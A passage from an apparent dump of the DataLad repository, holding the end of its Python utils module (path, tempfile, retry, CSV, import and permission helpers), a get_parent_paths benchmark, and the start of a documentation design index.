\"\"\"Return True if path starts with prefix path\n\n Parameters\n ----------\n path: str\n prefix: str\n \"\"\"\n path, prefix = _get_normalized_paths(path, prefix)\n return path.startswith(prefix)\n\n\ndef path_is_subpath(path: str, prefix: str) -> bool:\n \"\"\"Return True if path is a subpath of prefix\n\n It will return False if path == prefix.\n\n Parameters\n ----------\n path: str\n prefix: str\n \"\"\"\n path, prefix = _get_normalized_paths(path, prefix)\n return (len(prefix) < len(path)) and path.startswith(prefix)\n\n\ndef knows_annex(path: str | Path) -> bool:\n \"\"\"Returns whether at a given path there is information about an annex\n\n It is just a thin wrapper around GitRepo.is_with_annex() classmethod\n which also checks for `path` to exist first.\n\n This includes actually present annexes, but also uninitialized ones, or\n even the presence of a remote annex branch.\n \"\"\"\n from os.path import exists\n if not exists(path):\n lgr.debug(\"No annex: test path %s doesn't exist\", path)\n return False\n from datalad.support.gitrepo import GitRepo\n return GitRepo(path, init=False, create=False).is_with_annex()\n\n\n@contextmanager\ndef make_tempfile(content: str | bytes | None = None, wrapped: Optional[Callable[..., Any]] = None, **tkwargs: Any) -> Iterator[str]:\n \"\"\"Helper class to provide a temporary file name and remove it at the end (context manager)\n\n Parameters\n ----------\n mkdir : bool, optional (default: False)\n If True, temporary directory created using tempfile.mkdtemp()\n content : str or bytes, optional\n Content to be stored in the file created\n wrapped : function, optional\n If set, function name used to prefix temporary file name\n `**tkwargs`:\n All other arguments are passed into the call to tempfile.mk{,d}temp(),\n and resultant temporary filename is passed as the first argument into\n the function t. If no 'prefix' argument is provided, it will be\n constructed using module and function names ('.' replaced with\n '_').\n\n To change the used directory without providing keyword argument 'dir' set\n DATALAD_TESTS_TEMP_DIR.\n\n Examples\n --------\n >>> from os.path import exists\n >>> from datalad.utils import make_tempfile\n >>> with make_tempfile() as fname:\n ... 
k = open(fname, 'w').write('silly test')\n >>> assert not exists(fname) # was removed\n\n >>> with make_tempfile(content=\"blah\") as fname:\n ... assert open(fname).read() == \"blah\"\n \"\"\"\n\n if tkwargs.get('mkdir', None) and content is not None:\n raise ValueError(\"mkdir=True while providing content makes no sense\")\n\n tkwargs_ = get_tempfile_kwargs(tkwargs, wrapped=wrapped)\n\n # if DATALAD_TESTS_TEMP_DIR is set, use that as directory,\n # let mktemp handle it otherwise. However, an explicitly provided\n # dir=... will override this.\n mkdir = bool(tkwargs_.pop('mkdir', False))\n\n filename = {False: tempfile.mktemp,\n True: tempfile.mkdtemp}[mkdir](**tkwargs_)\n # MIH: not clear to me why we need to perform this (possibly expensive)\n # resolve. It was already part of the original implementation\n # 008d9ab8cc3e0170c0a9b8479e80dee9ffe6eb7f\n filepath = Path(filename).resolve()\n\n if content:\n if isinstance(content, bytes):\n filepath.write_bytes(content)\n else:\n filepath.write_text(content)\n\n # TODO globbing below can also be done with pathlib\n filename = str(filepath)\n\n if __debug__:\n lgr.debug(\n 'Created temporary %s named %s',\n 'directory' if mkdir else 'file',\n filename)\n try:\n yield filename\n finally:\n # glob here for all files with the same name (-suffix)\n # would be useful whenever we requested .img filename,\n # and function creates .hdr as well\n # MIH: this is undocumented behavior, and undesired in the general\n # case. it should be made conditional and explicit\n lsuffix = len(tkwargs_.get('suffix', ''))\n filename_ = lsuffix and filename[:-lsuffix] or filename\n filenames = glob.glob(filename_ + '*')\n if len(filename_) < 3 or len(filenames) > 5:\n # For paranoid yoh who stepped into this already ones ;-)\n lgr.warning(\"It is unlikely that it was intended to remove all\"\n \" files matching %r. Skipping\" % filename_)\n return\n for f in filenames:\n try:\n rmtemp(f)\n except OSError: # pragma: no cover\n pass\n\n\ndef _path_(*p: str) -> str:\n \"\"\"Given a path in POSIX notation, regenerate one in native to the env one\"\"\"\n if on_windows:\n return op.join(*map(lambda x: op.join(*x.split('/')), p))\n else:\n # Assume that all others as POSIX compliant so nothing to be done\n return op.join(*p)\n\n\ndef get_timestamp_suffix(time_: int | time.struct_time | None=None, prefix: str='-') -> str:\n \"\"\"Return a time stamp (full date and time up to second)\n\n primarily to be used for generation of log files names\n \"\"\"\n args = []\n if time_ is not None:\n if isinstance(time_, int):\n time_ = time.gmtime(time_)\n args.append(time_)\n return time.strftime(prefix + TIMESTAMP_FMT, *args)\n\n\n# unused in -core\ndef get_logfilename(dspath: str | Path, cmd: str='datalad') -> str:\n \"\"\"Return a filename to use for logging under a dataset/repository\n\n directory would be created if doesn't exist, but dspath must exist\n and be a directory\n \"\"\"\n assert(exists(dspath))\n assert(isdir(dspath))\n ds_logdir = ensure_dir(str(dspath), '.git', 'datalad', 'logs') # TODO: use WEB_META_LOG whenever #789 merged\n return op.join(ds_logdir, 'crawl-%s.log' % get_timestamp_suffix())\n\n\ndef get_trace(edges: Sequence[tuple[T, T]], start: T, end: T, trace: Optional[list[T]]=None) -> Optional[list[T]]:\n \"\"\"Return the trace/path to reach a node in a tree.\n\n Parameters\n ----------\n edges : sequence(2-tuple)\n The tree given by a sequence of edges (parent, child) tuples. 
The\n nodes can be identified by any value and data type that supports\n the '==' operation.\n start :\n Identifier of the start node. Must be present as a value in the parent\n location of an edge tuple in order to be found.\n end :\n Identifier of the target/end node. Must be present as a value in the child\n location of an edge tuple in order to be found.\n trace : list\n Mostly useful for recursive calls, and used internally.\n\n Returns\n -------\n None or list\n Returns a list with the trace to the target (the starts and the target\n are not included in the trace, hence if start and end are directly connected\n an empty list is returned), or None when no trace to the target can be found,\n or start and end are identical.\n \"\"\"\n # the term trace is used to avoid confusion with a path in the sense\n # of a filesystem path, but the analogy fits and nodes can be paths\n if trace is None:\n trace = []\n if not edges:\n raise ValueError(\"no edges given\")\n for cand in edges:\n cand_super, cand_sub = cand\n if cand_sub in trace:\n # only DAGs, skip any cyclic traces\n continue\n if trace and cand_super != trace[-1]:\n # only consider edges that lead off the end of the trace\n continue\n if not trace and cand_super != start:\n # we got nothing yet, and this edges is not matching the start\n continue\n if cand_sub == end:\n return trace\n # dive into potential subnodes\n cand_trace = get_trace(\n edges,\n start,\n end,\n trace + [cand_sub])\n if cand_trace:\n return cand_trace\n return None\n\n\ndef get_dataset_root(path: str | Path) -> Optional[str]:\n \"\"\"Return the root of an existent dataset containing a given path\n\n The root path is returned in the same absolute or relative form\n as the input argument. If no associated dataset exists, or the\n input path doesn't exist, None is returned.\n\n If `path` is a symlink or something other than a directory, its\n the root dataset containing its parent directory will be reported.\n If none can be found, at a symlink at `path` is pointing to a\n dataset, `path` itself will be reported as the root.\n\n Parameters\n ----------\n path : Path-like\n\n Returns\n -------\n str or None\n \"\"\"\n\n # NOTE: path = \"\" is effectively \".\"\n\n path = str(path)\n suffix = '.git'\n altered = None\n if islink(path) or not isdir(path):\n altered = path\n path = dirname(path)\n apath = abspath(path)\n # while we can still go up\n while split(apath)[1]:\n if exists(op.join(path, suffix)):\n return path\n # new test path in the format we got it\n path = normpath(op.join(path, os.pardir))\n # no luck, next round\n apath = abspath(path)\n # if we applied dirname() at the top, we give it another go with\n # the actual path, if it was itself a symlink, it could be the\n # top-level dataset itself\n if altered and exists(op.join(altered, suffix)):\n return altered\n\n return None\n\n\n# ATM used in datalad_crawler extension, so do not remove yet\ndef try_multiple(ntrials: int, exception: type[BaseException], base: float, f: Callable[P, T], *args: P.args, **kwargs: P.kwargs) -> T:\n \"\"\"Call f multiple times making exponentially growing delay between the calls\"\"\"\n for trial in range(1, ntrials+1):\n try:\n return f(*args, **kwargs)\n except exception as exc:\n if trial == ntrials:\n raise # just reraise on the last trial\n t = base ** trial\n lgr.warning(\"Caught %s on trial #%d. 
Sleeping %f and retrying\",\n CapturedException(exc), trial, t)\n sleep(t)\n raise ValueError(\"ntrials must be > 0\")\n\n\n@optional_args\ndef try_multiple_dec(\n f: Callable[P, T],\n ntrials: Optional[int] = None,\n duration: float = 0.1,\n exceptions: type[BaseException] | tuple[type[BaseException], ...] | None = None,\n increment_type: Literal[\"exponential\"] | None = None,\n exceptions_filter: Optional[Callable[[BaseException], Any]] = None,\n logger: Optional[Callable] = None,\n) -> Callable[P, T]:\n \"\"\"Decorator to try function multiple times.\n\n Main purpose is to decorate functions dealing with removal of files/directories\n and which might need a few seconds to work correctly on Windows which takes\n its time to release files/directories.\n\n Parameters\n ----------\n ntrials: int, optional\n duration: float, optional\n Seconds to sleep before retrying.\n increment_type: {None, 'exponential'}\n Note that if it is exponential, duration should typically be > 1.0\n so it grows with higher power\n exceptions: Exception or tuple of Exceptions, optional\n Exception or a tuple of multiple exceptions, on which to retry\n exceptions_filter: callable, optional\n If provided, this function will be called with a caught exception\n instance. If function returns True - we will re-try, if False - exception\n will be re-raised without retrying.\n logger: callable, optional\n Logger to log upon failure. If not provided, will use stock logger\n at the level of 5 (heavy debug).\n \"\"\"\n # We need to bind these to new names so that mypy doesn't complain about\n # the values possibly being `None` inside the inner function:\n exceptions_: type[BaseException] | tuple[type[BaseException], ...]\n if not exceptions:\n exceptions_ = (OSError, PermissionError) if on_windows else OSError\n else:\n exceptions_ = exceptions\n if not ntrials:\n # Life goes fast on proper systems, no need to delay it much\n ntrials_ = 100 if on_windows else 10\n else:\n ntrials_ = ntrials\n if logger is None:\n def logger_(*args: Any, **kwargs: Any) -> None:\n return lgr.log(5, *args, **kwargs)\n else:\n logger_ = logger\n assert increment_type in {None, 'exponential'}\n\n @wraps(f)\n def _wrap_try_multiple_dec(*args: P.args, **kwargs: P.kwargs) -> T:\n t = duration\n for trial in range(ntrials_):\n try:\n return f(*args, **kwargs)\n except exceptions_ as exc:\n if exceptions_filter and not exceptions_filter(exc):\n raise\n if trial < ntrials_ - 1:\n if increment_type == 'exponential':\n t = duration ** (trial + 1)\n logger_(\n \"Caught %s on trial #%d. Sleeping %f and retrying\",\n CapturedException(exc), trial, t)\n sleep(t)\n else:\n raise\n raise ValueError(\"ntrials must be > 0\")\n\n return _wrap_try_multiple_dec\n\n\n@try_multiple_dec\ndef unlink(f: str | Path) -> None:\n \"\"\"'Robust' unlink. 
Would try multiple times\n\n On windows boxes there is evidence for a latency of more than a second\n until a file is considered no longer \"in-use\".\n WindowsError is not known on Linux, and if IOError or any other\n exception\n is thrown then if except statement has WindowsError in it -- NameError\n also see gh-2533\n \"\"\"\n # Check for open files\n assert_no_open_files(f)\n return os.unlink(f)\n\n\n@try_multiple_dec\ndef _rmtree(*args: Any, **kwargs: Any) -> None:\n \"\"\"Just a helper to decorate shutil.rmtree.\n\n rmtree defined above does more and ideally should not itself be decorated\n since a recursive definition and does checks for open files inside etc -\n might be too runtime expensive\n \"\"\"\n shutil.rmtree(*args, **kwargs)\n\n\ndef slash_join(base: Optional[str], extension: Optional[str]) -> Optional[str]:\n \"\"\"Join two strings with a '/', avoiding duplicate slashes\n\n If any of the strings is None the other is returned as is.\n \"\"\"\n if extension is None:\n return base\n if base is None:\n return extension\n return '/'.join(\n (base.rstrip('/'),\n extension.lstrip('/')))\n\n\n#\n# IO Helpers\n#\n\n# unused in -core\ndef open_r_encdetect(fname: str | Path, readahead: int=1000) -> IO[str]:\n \"\"\"Return a file object in read mode with auto-detected encoding\n\n This is helpful when dealing with files of unknown encoding.\n\n Parameters\n ----------\n readahead: int, optional\n How many bytes to read for guessing the encoding type. If\n negative - full file will be read\n \"\"\"\n import io\n\n from chardet import detect\n\n # read some bytes from the file\n with open(fname, 'rb') as f:\n head = f.read(readahead)\n enc = detect(head)\n denc = enc.get('encoding', None)\n lgr.debug(\"Auto-detected encoding %s for file %s (confidence: %s)\",\n denc,\n fname,\n enc.get('confidence', 'unknown'))\n return io.open(fname, encoding=denc)\n\n\n@overload\ndef read_file(fname: str | Path, decode: Literal[True] =True) -> str:\n ...\n\n@overload\ndef read_file(fname: str | Path, decode: Literal[False]) -> bytes:\n ...\n\ndef read_file(fname: str | Path, decode: Literal[True, False] =True) -> str | bytes:\n \"\"\"A helper to read file passing content via ensure_unicode\n\n Parameters\n ----------\n decode: bool, optional\n if False, no ensure_unicode and file content returned as bytes\n \"\"\"\n with open(fname, 'rb') as f:\n content = f.read()\n return ensure_unicode(content) if decode else content\n\n\ndef read_csv_lines(fname: str | Path, dialect: Optional[str] = None, readahead: int=16384, **kwargs: Any) -> Iterator[dict[str, str]]:\n \"\"\"A generator of dict records from a CSV/TSV\n\n Automatically guesses the encoding for each record to convert to UTF-8\n\n Parameters\n ----------\n fname: str\n Filename\n dialect: str, optional\n Dialect to specify to csv.reader. 
If not specified -- guessed from\n the file, if fails to guess, \"excel-tab\" is assumed\n readahead: int, optional\n How many bytes to read from the file to guess the type\n **kwargs\n Passed to `csv.reader`\n \"\"\"\n import csv\n csv_dialect: str | type[csv.Dialect]\n if dialect is None:\n with open(fname) as tsvfile:\n # add robustness, use a sniffer\n try:\n csv_dialect = csv.Sniffer().sniff(tsvfile.read(readahead))\n except Exception as exc:\n lgr.warning(\n 'Could not determine file-format, assuming TSV: %s',\n CapturedException(exc)\n )\n csv_dialect = 'excel-tab'\n else:\n csv_dialect = dialect\n\n with open(fname, 'r', encoding=\"utf-8\") as tsvfile:\n csv_reader = csv.reader(\n tsvfile,\n dialect=csv_dialect,\n **kwargs\n )\n header: Optional[list[str]] = None\n for row in csv_reader:\n if header is None:\n header = row\n else:\n yield dict(zip(header, row))\n\n\ndef import_modules(modnames: Iterable[str], pkg: str, msg: str=\"Failed to import {module}\", log: Callable[[str], Any]=lgr.debug) -> list[ModuleType]:\n \"\"\"Helper to import a list of modules without failing if N/A\n\n Parameters\n ----------\n modnames: list of str\n List of module names to import\n pkg: str\n Package under which to import\n msg: str, optional\n Message template for .format() to log at DEBUG level if import fails.\n Keys {module} and {package} will be provided and ': {exception}' appended\n log: callable, optional\n Logger call to use for logging messages\n \"\"\"\n from importlib import import_module\n _globals = globals()\n mods_loaded = []\n if pkg and not pkg in sys.modules:\n # with python 3.5.1 (ok with 3.5.5) somehow kept running into\n # Failed to import dlsub1: Parent module 'dltestm1' not loaded\n # while running the test. Preloading pkg resolved the issue\n import_module(pkg)\n for modname in modnames:\n try:\n _globals[modname] = mod = import_module(\n '.{}'.format(modname),\n pkg)\n mods_loaded.append(mod)\n except Exception as exc:\n from datalad.support.exceptions import CapturedException\n ce = CapturedException(exc)\n log((msg + ': {exception}').format(\n module=modname, package=pkg, exception=ce.message))\n return mods_loaded\n\n\ndef import_module_from_file(modpath: str, pkg: Optional[ModuleType]=None, log: Callable[[str], Any]=lgr.debug) -> ModuleType:\n \"\"\"Import provided module given a path\n\n TODO:\n - RF/make use of it in pipeline.py which has similar logic\n - join with import_modules above?\n\n Parameters\n ----------\n pkg: module, optional\n If provided, and modpath is under pkg.__path__, relative import will be\n used\n \"\"\"\n assert(modpath.endswith('.py')) # for now just for .py files\n\n log(\"Importing %s\" % modpath)\n\n modname = basename(modpath)[:-3]\n relmodpath = None\n if pkg:\n for pkgpath in pkg.__path__:\n if path_is_subpath(modpath, pkgpath):\n # for now relying on having .py extension -- assertion above\n relmodpath = '.' 
+ relpath(modpath[:-3], pkgpath).replace(sep, '.')\n break\n\n try:\n if relmodpath:\n from importlib import import_module\n mod = import_module(relmodpath, pkg.__name__ if pkg is not None else None)\n else:\n dirname_ = dirname(modpath)\n try:\n sys.path.insert(0, dirname_)\n mod = __import__(modname, level=0)\n finally:\n if dirname_ in sys.path:\n sys.path.pop(sys.path.index(dirname_))\n else:\n log(\"Expected path %s to be within sys.path, but it was gone!\" % dirname_)\n except Exception as e:\n raise RuntimeError(\n \"Failed to import module from %s\" % modpath) from e\n\n return mod\n\n\ndef get_encoding_info() -> dict[str, str]:\n \"\"\"Return a dictionary with various encoding/locale information\"\"\"\n import locale\n import sys\n return dict([\n ('default', sys.getdefaultencoding()),\n ('filesystem', sys.getfilesystemencoding()),\n ('locale.prefered', locale.getpreferredencoding()),\n ])\n\n\ndef get_envvars_info() -> dict[str, str]:\n envs = []\n for var, val in os.environ.items():\n if (\n var.startswith('PYTHON') or\n var.startswith('LC_') or\n var.startswith('GIT_') or\n var in ('LANG', 'LANGUAGE', 'PATH')\n ):\n envs.append((var, val))\n return dict(envs)\n\n\n# This class is modified from Snakemake (v5.1.4)\nclass SequenceFormatter(string.Formatter):\n \"\"\"string.Formatter subclass with special behavior for sequences.\n\n This class delegates formatting of individual elements to another\n formatter object. Non-list objects are formatted by calling the\n delegate formatter's \"format_field\" method. List-like objects\n (list, tuple, set, frozenset) are formatted by formatting each\n element of the list according to the specified format spec using\n the delegate formatter and then joining the resulting strings with\n a separator (space by default).\n \"\"\"\n\n def __init__(self, separator: str=\" \", element_formatter: string.Formatter =string.Formatter(),\n *args: Any, **kwargs: Any) -> None:\n self.separator = separator\n self.element_formatter = element_formatter\n\n def format_element(self, elem: Any, format_spec: str) -> Any:\n \"\"\"Format a single element\n\n For sequences, this is called once for each element in a\n sequence. For anything else, it is called on the entire\n object. 
It is intended to be overridden in subclases.\n \"\"\"\n return self.element_formatter.format_field(elem, format_spec)\n\n def format_field(self, value: Any, format_spec: str) -> Any:\n if isinstance(value, (list, tuple, set, frozenset)):\n return self.separator.join(self.format_element(v, format_spec)\n for v in value)\n else:\n return self.format_element(value, format_spec)\n\n\n# TODO: eventually we might want to make use of attr module\nclass File:\n \"\"\"Helper for a file entry in the create_tree/@with_tree\n\n It allows to define additional settings for entries\n \"\"\"\n def __init__(self, name: str, executable: bool=False) -> None:\n \"\"\"\n\n Parameters\n ----------\n name : str\n Name of the file\n executable: bool, optional\n Make it executable\n \"\"\"\n self.name = name\n self.executable = executable\n\n def __str__(self) -> str:\n return self.name\n\n\nTreeSpec = Union[\n Tuple[Tuple[Union[str, File], \"Load\"], ...],\n List[Tuple[Union[str, File], \"Load\"]],\n Dict[Union[str, File], \"Load\"],\n]\n\nLoad = Union[str, bytes, \"TreeSpec\"]\n\n\ndef create_tree_archive(path: str, name: str, load: TreeSpec, overwrite: bool=False, archives_leading_dir: bool=True) -> None:\n \"\"\"Given an archive `name`, create under `path` with specified `load` tree\n \"\"\"\n from datalad.support.archives import compress_files\n dirname = file_basename(name)\n full_dirname = op.join(path, dirname)\n os.makedirs(full_dirname)\n create_tree(full_dirname, load, archives_leading_dir=archives_leading_dir)\n # create archive\n if archives_leading_dir:\n compress_files([dirname], name, path=path, overwrite=overwrite)\n else:\n compress_files(\n # <https://github.com/python/mypy/issues/9864>\n list(map(basename, glob.glob(op.join(full_dirname, '*')))), # type: ignore[arg-type]\n op.join(pardir, name),\n path=op.join(path, dirname),\n overwrite=overwrite)\n # remove original tree\n rmtree(full_dirname)\n\n\ndef create_tree(path: str, tree: TreeSpec, archives_leading_dir: bool =True, remove_existing: bool =False) -> None:\n \"\"\"Given a list of tuples (name, load) create such a tree\n\n if load is a tuple itself -- that would create either a subtree or an archive\n with that content and place it into the tree if name ends with .tar.gz\n \"\"\"\n lgr.log(5, \"Creating a tree under %s\", path)\n if not exists(path):\n os.makedirs(path)\n\n if isinstance(tree, dict):\n tree = list(tree.items())\n\n for file_, load in tree:\n if isinstance(file_, File):\n executable = file_.executable\n name = file_.name\n else:\n executable = False\n name = file_\n full_name = op.join(path, name)\n if remove_existing and lexists(full_name):\n rmtree(full_name, chmod_files=True)\n if isinstance(load, (tuple, list, dict)):\n if name.endswith('.tar.gz') or name.endswith('.tar') or name.endswith('.zip'):\n create_tree_archive(\n path, name, load,\n archives_leading_dir=archives_leading_dir)\n else:\n create_tree(\n full_name, load,\n archives_leading_dir=archives_leading_dir,\n remove_existing=remove_existing)\n else:\n if full_name.endswith('.gz'):\n def open_func() -> IO[bytes]:\n return gzip.open(full_name, \"wb\") # type: ignore[return-value]\n elif full_name.split('.')[-1] in ('xz', 'lzma'):\n import lzma\n def open_func() -> IO[bytes]:\n return lzma.open(full_name, \"wb\")\n else:\n def open_func() -> IO[bytes]:\n return open(full_name, \"wb\")\n with open_func() as f:\n f.write(ensure_bytes(load, 'utf-8'))\n if executable:\n os.chmod(full_name, os.stat(full_name).st_mode | stat.S_IEXEC)\n\n\ndef 
get_suggestions_msg(values: Optional[str | Iterable[str]], known: str, sep: str=\"\\n \") -> str:\n \"\"\"Return a formatted string with suggestions for values given the known ones\n \"\"\"\n import difflib\n suggestions = []\n if not values:\n values = []\n elif isinstance(values, str):\n values = [values]\n for value in values: # might not want to do it if we change presentation below\n suggestions += difflib.get_close_matches(value, known)\n suggestions = unique(suggestions)\n msg = \"Did you mean any of these?\"\n if suggestions:\n if '\\n' in sep:\n # if separator includes new line - we add entire separator right away\n msg += sep\n else:\n msg += ' '\n return msg + \"%s\\n\" % sep.join(suggestions)\n return ''\n\n\ndef bytes2human(n: int | float, format: str ='%(value).1f %(symbol)sB') -> str:\n \"\"\"\n Convert n bytes into a human readable string based on format.\n symbols can be either \"customary\", \"customary_ext\", \"iec\" or \"iec_ext\",\n see: http://goo.gl/kTQMs\n\n >>> from datalad.utils import bytes2human\n >>> bytes2human(1)\n '1.0 B'\n >>> bytes2human(1024)\n '1.0 KB'\n >>> bytes2human(1048576)\n '1.0 MB'\n >>> bytes2human(1099511627776127398123789121)\n '909.5 YB'\n\n >>> bytes2human(10000, \"%(value).1f %(symbol)s/sec\")\n '9.8 K/sec'\n\n >>> # precision can be adjusted by playing with %f operator\n >>> bytes2human(10000, format=\"%(value).5f %(symbol)s\")\n '9.76562 K'\n\n Taken from: http://goo.gl/kTQMs and subsequently simplified\n Original Author: Giampaolo Rodola' <g.rodola [AT] gmail [DOT] com>\n License: MIT\n \"\"\"\n n = int(n)\n if n < 0:\n raise ValueError(\"n < 0\")\n symbols = ('', 'K', 'M', 'G', 'T', 'P', 'E', 'Z', 'Y')\n prefix = {}\n for i, s in enumerate(symbols[1:]):\n prefix[s] = 1 << (i + 1) * 10\n for symbol in reversed(symbols[1:]):\n if n >= prefix[symbol]:\n value = float(n) / prefix[symbol]\n return format % locals()\n return format % dict(symbol=symbols[0], value=n)\n\n\ndef quote_cmdlinearg(arg: str) -> str:\n \"\"\"Perform platform-appropriate argument quoting\"\"\"\n # https://stackoverflow.com/a/15262019\n return '\"{}\"'.format(\n arg.replace('\"', '\"\"')\n ) if on_windows else shlex_quote(arg)\n\n\ndef guard_for_format(arg: str) -> str:\n \"\"\"Replace { and } with {{ and }}\n\n To be used in cases if arg is not expected to have provided\n by user .format() placeholders, but 'arg' might become a part\n of a composite passed to .format(), e.g. 
via 'Run'\n \"\"\"\n return arg.replace('{', '{{').replace('}', '}}')\n\n\ndef join_cmdline(args: Iterable[str]) -> str:\n \"\"\"Join command line args into a string using quote_cmdlinearg\n \"\"\"\n return ' '.join(map(quote_cmdlinearg, args))\n\n\ndef split_cmdline(s: str) -> list[str]:\n \"\"\"Perform platform-appropriate command line splitting.\n\n Identical to `shlex.split()` on non-windows platforms.\n\n Modified from https://stackoverflow.com/a/35900070\n \"\"\"\n if not on_windows:\n return shlex_split(s)\n\n # the rest is for windows\n RE_CMD_LEX = r'''\"((?:\"\"|\\\\[\"\\\\]|[^\"])*)\"?()|(\\\\\\\\(?=\\\\*\")|\\\\\")|(&&?|\\|\\|?|\\d?>|[<])|([^\\s\"&|<>]+)|(\\s+)|(.)'''\n\n args = []\n accu = None # collects pieces of one arg\n for qs, qss, esc, pipe, word, white, fail in re.findall(RE_CMD_LEX, s):\n if word:\n pass # most frequent\n elif esc:\n word = esc[1]\n elif white or pipe:\n if accu is not None:\n args.append(accu)\n if pipe:\n args.append(pipe)\n accu = None\n continue\n elif fail:\n raise ValueError(\"invalid or incomplete shell string\")\n elif qs:\n word = qs.replace('\\\\\"', '\"').replace('\\\\\\\\', '\\\\')\n if platform == 0:\n word = word.replace('\"\"', '\"')\n else:\n word = qss # may be even empty; must be last\n\n accu = (accu or '') + word\n\n if accu is not None:\n args.append(accu)\n\n return args\n\n\ndef get_wrapped_class(wrapped: Callable) -> type:\n \"\"\"Determine the command class a wrapped __call__ belongs to\"\"\"\n mod = sys.modules[wrapped.__module__]\n command_class_name = wrapped.__qualname__.split('.')[-2]\n _func_class = mod.__dict__[command_class_name]\n lgr.debug(\"Determined class of decorated function: %s\", _func_class)\n return _func_class\n\n\ndef _make_assure_kludge(fn: Callable[P, T]) -> Callable[P, T]:\n old_name = fn.__name__.replace(\"ensure\", \"assure\")\n\n @wraps(fn)\n def compat_fn(*args: P.args, **kwargs: P.kwargs) -> T:\n warnings.warn(\n \"{} is deprecated and will be removed in a future release. \"\n \"Use {} instead.\"\n .format(old_name, fn.__name__),\n DeprecationWarning)\n return fn(*args, **kwargs)\n\n compat_fn.__doc__ = (\"Note: This function is deprecated. Use {} instead.\"\n .format(fn.__name__))\n return compat_fn\n\n\nassure_tuple_or_list = _make_assure_kludge(ensure_tuple_or_list)\nassure_iter = _make_assure_kludge(ensure_iter)\nassure_list = _make_assure_kludge(ensure_list)\nassure_list_from_str = _make_assure_kludge(ensure_list_from_str)\nassure_dict_from_str = _make_assure_kludge(ensure_dict_from_str)\nassure_bytes = _make_assure_kludge(ensure_bytes)\nassure_unicode = _make_assure_kludge(ensure_unicode)\nassure_bool = _make_assure_kludge(ensure_bool)\nassure_dir = _make_assure_kludge(ensure_dir)\n\n\nlgr.log(5, \"Done importing datalad.utils\")\n\n\ndef check_symlink_capability(path: Path, target: Path) -> bool:\n \"\"\"helper similar to datalad.tests.utils_pytest.has_symlink_capability\n\n However, for use in a datalad command context, we shouldn't\n assume to be able to write to tmpfile and also not import a whole lot from\n datalad's test machinery. Finally, we want to know, whether we can create a\n symlink at a specific location, not just somewhere. Therefore use\n arbitrary path to test-build a symlink and delete afterwards. 
Suitable\n location can therefore be determined by high lever code.\n\n Parameters\n ----------\n path: Path\n target: Path\n\n Returns\n -------\n bool\n \"\"\"\n\n try:\n target.touch()\n path.symlink_to(target)\n return True\n except Exception:\n return False\n finally:\n if path.exists():\n path.unlink()\n if target.exists():\n target.unlink()\n\n\ndef obtain_write_permission(path: Path) -> Optional[int]:\n \"\"\"Obtains write permission for `path` and returns previous mode if a\n change was actually made.\n\n Parameters\n ----------\n path: Path\n path to try to obtain write permission for\n\n Returns\n -------\n int or None\n previous mode of `path` as return by stat().st_mode if a change in\n permission was actually necessary, `None` otherwise.\n \"\"\"\n\n mode = path.stat().st_mode\n # only IWRITE works on Windows, in principle\n if not mode & stat.S_IWRITE:\n path.chmod(mode | stat.S_IWRITE)\n return mode\n else:\n return None\n\n\n@contextmanager\ndef ensure_write_permission(path: Path) -> Iterator[None]:\n \"\"\"Context manager to get write permission on `path` and\n restore original mode afterwards.\n\n Parameters\n ----------\n path: Path\n path to the target file\n\n Raises\n ------\n PermissionError\n if write permission could not be obtained\n \"\"\"\n\n restore = None\n try:\n restore = obtain_write_permission(path)\n yield\n finally:\n if restore is not None:\n try:\n path.chmod(restore)\n except FileNotFoundError:\n # If `path` was deleted within the context block, there's\n # nothing to do. Don't test exists(), though - asking for\n # forgiveness to save a call.\n pass\n" }, { "alpha_fraction": 0.6390670537948608, "alphanum_fraction": 0.6425656080245972, "avg_line_length": 41.875, "blob_id": "97b33cdb46ba7abe78a8e177f85b4768a1db21e7", "content_id": "2471c2ae40ca8392ee57afa826f5941c427c07df", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1715, "license_type": "permissive", "max_line_length": 88, "num_lines": 40, "path": "/benchmarks/support/path.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# Import functions to be tested with _ suffix and name the suite after the\n# original function so we could easily benchmark it e.g. 
by\n# asv run --python=same -b get_parent_paths\n# without need to discover what benchmark to use etc\n\nfrom datalad.support.path import get_parent_paths as get_parent_paths_\n\nfrom ..common import SuprocBenchmarks\n\nclass get_parent_paths(SuprocBenchmarks):\n\n def setup(self):\n # prepare some more or less realistic with a good number of paths\n # and some hierarchy of submodules\n self.nfiles = 40 # per each construct\n self.nsubmod = 30 # at two levels\n self.toplevel_submods = ['submod%d' % i for i in range(self.nsubmod)]\n self.posixpaths = \\\n ['file%d' % i for i in range(self.nfiles)] + \\\n ['subdir/anotherfile%d' % i for i in range(self.nfiles)]\n for submod in range(self.nsubmod):\n self.posixpaths += \\\n ['submod%d/file%d' % (submod, i) for i in range(self.nfiles)] + \\\n ['subdir/submod%d/file%d' % (submod, i) for i in range(self.nfiles)] + \\\n ['submod/sub%d/file%d' % (submod, i) for i in range(self.nfiles)]\n\n def time_no_submods(self):\n assert get_parent_paths_(self.posixpaths, [], True) == []\n\n def time_one_submod_toplevel(self):\n get_parent_paths_(self.posixpaths, ['submod9'], True)\n\n def time_one_submod_subdir(self):\n get_parent_paths_(self.posixpaths, ['subdir/submod9'], True)\n\n def time_allsubmods_toplevel_only(self):\n get_parent_paths_(self.posixpaths, self.toplevel_submods, True)\n\n def time_allsubmods_toplevel(self):\n get_parent_paths_(self.posixpaths, self.toplevel_submods)\n" }, { "alpha_fraction": 0.6813880205154419, "alphanum_fraction": 0.6908517479896545, "avg_line_length": 16.135135650634766, "blob_id": "0aa329df9f4549e651189a05912a5eafa41fb120", "content_id": "7e8ee385cb74a1d44512f745f23f7fd0d7504977", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 634, "license_type": "permissive", "max_line_length": 73, "num_lines": 37, "path": "/docs/source/design/index.rst", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": ".. -*- mode: rst -*-\n.. vi: set ft=rst sts=4 ts=4 sw=4 et tw=79:\n\n.. _chap_design:\n\n******\nDesign\n******\n\nThe chapter described command API principles and the design of particular\nsubsystems in DataLad.\n\n.. 
